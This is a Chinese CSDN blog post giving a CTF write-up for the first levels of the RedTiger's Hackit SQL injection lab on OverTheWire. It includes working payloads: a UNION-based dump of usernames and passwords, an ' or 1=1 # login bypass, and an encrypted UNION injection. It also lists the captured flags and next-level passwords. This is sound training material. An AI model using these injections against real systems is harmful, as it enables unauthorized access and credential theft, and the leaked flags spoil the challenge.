RedTiger's Hackit wirteup

最新推荐文章于 2022-07-27 21:20:55 发布

a370793934

最新推荐文章于 2022-07-27 21:20:55 发布

阅读量665

点赞数

分类专栏： WriteUp 文章标签： web sql writeup ctf

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

本文链接：https://blog.csdn.net/a370793934/article/details/103287052

版权

WriteUp 专栏收录该内容

20 篇文章 2 订阅

订阅专栏

sql注入挑战

level1

简单注入，payload:

http://redtiger.labs.overthewire.org/level1.php?cat=0 union select 1,2,username,password from level1_users

返回

Hornoxe

thatwaseasy

登录后显示

You made it!

You can raise your wechall.net score with this flag: 27cbddc803ecde822d87a7e8639f9315

The password for the next level is: passwords_will_change_over_time_let_us_do_a_shitty_rhyme

level2

万能密码登录bs抓包改POST内容：username=admin&password=' or 1=1 # &login=Login

You can raise your wechall.net score with this flag: 1222e2d4ad5da677efb188550528bfaa

The password for the next level is: feed_the_cat_who_eats_your_bread

level3

输入数组显示报错信息

Warning: preg_match() expects parameter 2 to be string, array given in /var/www/html/hackit/urlcrypt.inc on line 26

构造http://redtiger.labs.overthewire.org/urlcrypt.inc 得到源码

用源码加密明文' union select 1,password,2,3,4,5,6 from level3_users where username=’Admin

后构造payload

http://redtiger.labs.overthewire.org/level3.php?usr=MDc2MTUxMDIyMTc3MTM5MjMwMTQ1MDI0MjA5MTAwMTc3MTUzMDc0MTg3MDk1MDg0MjQzMDE3MjUyMDI1MTI2MTU2MTc2MTMzMDAwMjQ2MTU2MjA4MTgyMDk2MTI5MjIwMDQ5MDUyMjMwMTk4MTk2MTg5MTEzMDQxMjQwMTQ0MDM2MTQwMTY5MTcyMDgzMjQ0MDg3MTQxMTE1MDY2MTUzMjE0MDk1MDM4MTgxMTY1MDQ3MTE4MDg2MTQwMDM0MDg1MTE4MTE4MDk5MjIyMjE4MDEwMTkwMjIwMDcxMDQwMjIw

得到

Show userdetails:

Username: thisisaverysecurepasswordEEE5rt

First name: 5

Name: 6

ICQ: 4

Email: 3

登录得到

Login correct. You are admin :);

You can raise your wechall.net score with this flag: a707b245a60d570d25a0449c2a516eca

The password for the next level is: put_the_kitten_on_your_head

level4

盲注

Level5

登录过滤

待续

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
RedTiger's Hackit wirteup

sql注入挑战level1简单注入，payload:http://redtiger.labs.overthewire.org/level1.php?cat=0 union select 1,2,username,password from level1_users返回Hornoxethatwaseasy登录后显示You made it!You can raise...
复制链接

扫一扫

专栏目录

a370793934 CSDN认证博客专家 CSDN认证企业博客

码龄14年

19: 原创

14万+: 周排名

69万+: 总排名

6万+: 访问

: 等级

780: 积分

23: 粉丝

10: 获赞

9: 评论

87: 收藏

私信

关注

热门文章

分类专栏

WriteUp 20篇

最新评论

攻防世界pwn新手区writeup
寻因: 老哥，我可以问一下，CGfsb题，#payload = fmtstr_payload(10,{pwnme:8})为什么不行鸭
CTF-60 writeup
weixin_49592071: 这套题不错，在哪能练习呢？
CTF-60 writeup
Benjamink: 大佬你好，这些题在什么平台
Bugku新平台论剑场writeup
ctotalk: 努力奋斗
Jarvis-OJ-Web writeup
weixin_41596573: 为啥不一样的 [code=plain] root@192:~# sudo curl --local-port 51 http://web.jarvisoj.com:32770/ <!DOCTYPE html> <html> <head> <title>Web 100</title> <style type="text/css"> body { background:gray; text-align:center; } </style> </head> <body> <h3>Please use port 51 to visit this site.</h3> </body> </html> [/code]

大家在看

最新文章

目录

评论

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。